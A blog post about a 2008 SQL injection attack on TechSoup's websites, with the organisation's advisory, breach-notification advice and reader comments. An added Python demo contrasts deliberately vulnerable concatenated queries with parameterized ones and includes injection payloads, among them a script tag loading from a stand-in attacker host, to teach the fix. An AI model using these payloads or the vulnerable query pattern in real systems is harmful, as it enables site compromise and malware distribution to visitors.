
Techsoup Hit By SQL Injection Attack

I was wondering why Techsoup was down all day. The sad news after the jump:

UPDATE: As of 8/7/2008 3:37 EDT, Techsoup is up and running.

We have further information about what has caused our current website issues. We have suffered a SQL Injection attack. These types of attacks are known to exploit website vulnerabilities with the intent of distributing viruses and malware. We do not yet know all the details of this attack at this time. We do not have any specific evidence that malware or viruses were actually distributed; however, it is possible that people who visited our websites between 8:00PM PDT, Tuesday August 5, 2008 and 7:45AM PDT, Wednesday August 6, 2008 could have been exposed to viruses or malware. The impacted sites are:

* www.techsoup.org
* www.techsoup.org/stock
* www.techsoup.org/mar
* www.compumentor.org

We are advising anyone who visited any of the listed websites, during the hours noted above, to:

* Make sure your anti-virus software definitions are up-to-date.
* Run a scan of your hard drive to ensure no viruses or malware show up and follow the instructions to quarantine them.
* Review the information at http://www.us-cert.gov/cas/tips/ about managing viruses.
* Please continue to check this webpage [www.techsoup.org] (which is safe!) for further updates.

This sucks for the nonprofit technology community, but it is surprising to see SQL injection attacks on old code. There are well-known ways to stop a SQL injection attack, above all parameterized queries (prepared statements) that keep user input out of the statement text, and they have been built into most Web development frameworks and languages. If you want to know what a SQL injection attack is and how to stop it, check out the Wikipedia article.
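To make that concrete, here is an added illustration that is not code from the original post or from TechSoup: the query pattern that leaves an application open to this class of attack, side by side with the fix. It is written against Python's standard sqlite3 module so it runs offline; the `products` table, the sample rows, the tautology string and the attacker hostname are all constructed for the example. The two patterns it contrasts (string concatenation versus bound parameters) exist in every database driver, so the lesson carries over to whatever stack a site is built on.

```python
import sqlite3

# Constructed sample data for the illustration: a small catalogue whose
# page_html column is rendered to every visitor, standing in for any
# database-backed content store.
SAMPLE_ROWS = [
    (1, "Office suite", "<p>Office suite donation</p>"),
    (2, "Antivirus", "<p>Antivirus donation</p>"),
    (3, "Backup software", "<p>Backup software donation</p>"),
]

# Constructed attacker input (the hostname is made up). The leading part is
# the HTML the attacker wants every visitor to load; the closing quote,
# "WHERE 1=1" and the "--" comment hijack a concatenated UPDATE so that it
# rewrites every row instead of the one the application meant to touch.
PAYLOAD_HTML = "<script src=http://attacker.example/x.js></script>' WHERE 1=1 --"
# Classic tautology for a concatenated SELECT: ends the literal, then adds
# an always-true condition.
TAUTOLOGY = "' OR '1'='1"


def make_db():
    """Fresh in-memory database seeded with SAMPLE_ROWS."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, page_html TEXT)"
    )
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def find_product_vulnerable(conn, name):
    """VULNERABLE: request input is spliced into the statement text, so a
    quote inside `name` ends the literal and the rest is parsed as SQL."""
    sql = "SELECT id, name FROM products WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_product_safe(conn, name):
    """Parameterized query: the value travels separately from the SQL text
    and can only ever be compared against the column, never parsed."""
    sql = "SELECT id, name FROM products WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def set_page_html_vulnerable(conn, product_id, html):
    """VULNERABLE: the same concatenation on a write path."""
    sql = (
        "UPDATE products SET page_html = '" + html + "'"
        " WHERE id = " + str(product_id)
    )
    conn.execute(sql)
    conn.commit()


def set_page_html_safe(conn, product_id, html):
    """Parameterized UPDATE: whatever `html` contains is stored as data in
    the single targeted row."""
    conn.execute(
        "UPDATE products SET page_html = ? WHERE id = ?", (html, product_id)
    )
    conn.commit()


def pages_containing(conn, needle):
    """Number of stored pages whose HTML contains `needle`; used here to
    measure how far an injected script tag spread."""
    row = conn.execute(
        "SELECT count(*) FROM products WHERE page_html LIKE ?",
        ("%" + needle + "%",),
    ).fetchone()
    return row[0]


def demo():
    """Run both pairs against fresh databases and report what each did."""
    results = {}

    # Read path: the tautology dumps every row through the concatenated
    # query, while the parameterized one simply finds no product so named.
    conn = make_db()
    results["vulnerable_rows_returned"] = len(find_product_vulnerable(conn, TAUTOLOGY))
    results["safe_rows_returned"] = len(find_product_safe(conn, TAUTOLOGY))

    # Write path: the payload rewrites every page via the concatenated
    # UPDATE; the parameterized UPDATE stores it as text in row 1 only.
    conn = make_db()
    set_page_html_vulnerable(conn, 1, PAYLOAD_HTML)
    results["vulnerable_pages_infected"] = pages_containing(conn, "attacker.example")

    conn = make_db()
    set_page_html_safe(conn, 1, PAYLOAD_HTML)
    results["safe_pages_touched"] = pages_containing(conn, "attacker.example")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

Two caveats worth keeping in mind when reading the output. Parameterization closes the SQL injection hole, but in the safe write path the payload is still stored verbatim in row 1, so a site that renders that column unescaped would still serve the script tag from that one page; output encoding (or validating what editors may store) is a separate control. And the vulnerable UPDATE also concatenates the row id, so a non-numeric id from the request would be a second way in even if the HTML were handled correctly.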

As you may or may not know, Techsoup was the unlucky victim in another security breach when Convio was hit in November of last year. At the time, I issued some fairly stern remarks about the weak attempts at user notification regarding username and password breaches. I’m reprinting the remedies here:

Means of Notification
Individually notify those affected whenever possible.

  1. Send the notice by first-class mail.
  2. As an alternative, notify by e-mail, if you normally communicate with the affected individuals by e-mail and you have received their prior consent to that form of notification.
  3. If more than 500,000 individuals were affected, the cost of individual notification is more than $250,000, or you do not have adequate contact information on those affected, provide notice using public communication channels.
  • Post the notice conspicuously on your Web site, AND
  • Notify through major statewide media (television, radio, print), AND
  • Send the notice by e-mail to any affected party whose e-mail address you have.

I know the costs are going to be astronomical, but I believe that there’s no guarantee a simple Web page or subsequent alert e-mail is going to capture the entire Techsoup user base. For various reasons, people need to be alerted by all reasonable methods like the ones listed above. At this point, a TV or radio ad or at least something in the Chronicle of Philanthropy and Non-Profit Times is in order.

By the way, I was an unlucky user who was hit by the Convio breach. As a test, I left a few “junk” e-mail accounts and other kinds of accounts with the same username/password combination that was scooped up during the Convio breach by persons unknown. The slow but fairly methodical hacker(s) got to a couple of accounts only in the last month. This suggests a fairly organized criminal enterprise. I would not be surprised if this attack had similarly long-lasting consequences. I won’t be able to test this effect further, as my honeypot accounts no longer have the same username/password combination. I don’t know what information was hit, but my piece of advice to you is to immediately change all username/password combinations that match that of your account on Techsoup.

6 Comments

  • On 08.07.08 marnie webb said:

    Marnie Webb, here, co-CEO of TechSoup. Thanks, Allan, for helping to spread the word and advising users to make password changes (below the portion of our message that you quoted). We will, of course, be providing more information to our users through different channels. However, as we are still working on the issues, we wanted to share as quickly as possible and so posted the information on our landing page.

  • On 08.07.08 marnie webb said:

    Sorry for the additional comment: we are also keeping http://www.techsoup.org up-to-date so that we can share information as we have it. The full text of the message you quoted is there.

  • On 08.07.08 Jon Stahl said:

    Disappointing, but sadly, not surprising. Techsoup’s codebase is pretty old, and was written before awareness of these issues was as widespread as it is now.

    I wouldn’t be surprised to see a lot more attacks like this in the future against large nonprofit targets, since many of them are running similarly old, large custom apps and are tempting targets.

  • On 08.07.08 Allan Benamer said:

    @Marnie Webb: Yeah, I’m glad you’re trying to fix it but a security audit can take forever. No way to revert to an old version of the code and data or afraid it would just be attacked again? I really urge and implore you to consider those guidelines for notification. I can’t say how important it is to reach your user community in as many offline ways as possible to ensure that your users are adequately notified.

    @Jon Stahl: I guess you’re right. I’m wondering if it’s not already time to switch over to something open source for Techsoup. There are plenty of new frameworks out there for Techsoup to choose from, but I’m sure there’s a pretty huge sunk cost that they’d have to think about.

    That said, Techsoup is a utility in the nonprofit community now. It occupies a central portion of the nonprofit IT director’s time. It needs more uptime and I think an open source community development effort would work. I would think plenty of folks would pitch in to help out if Techsoup’s code was on an SVN or git repository out there.

  • On 08.12.08 Donald Lobo said:

    Some tech readers might also be interested in more details at:

    http://it.slashdot.org/article.pl?sid=08/08/12/1943217
    http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines

    Basically a lot of ColdFusion / MSSQL sites are open to attack. You can find more information about the attack by searching for vernyx.

  • On 08.16.08 Allan Benamer said:

    @Donald Lobo: Sorry for the delay in posting your comment — it turns out your comment got sent to spam. WP saw the multiple links and freaked out.
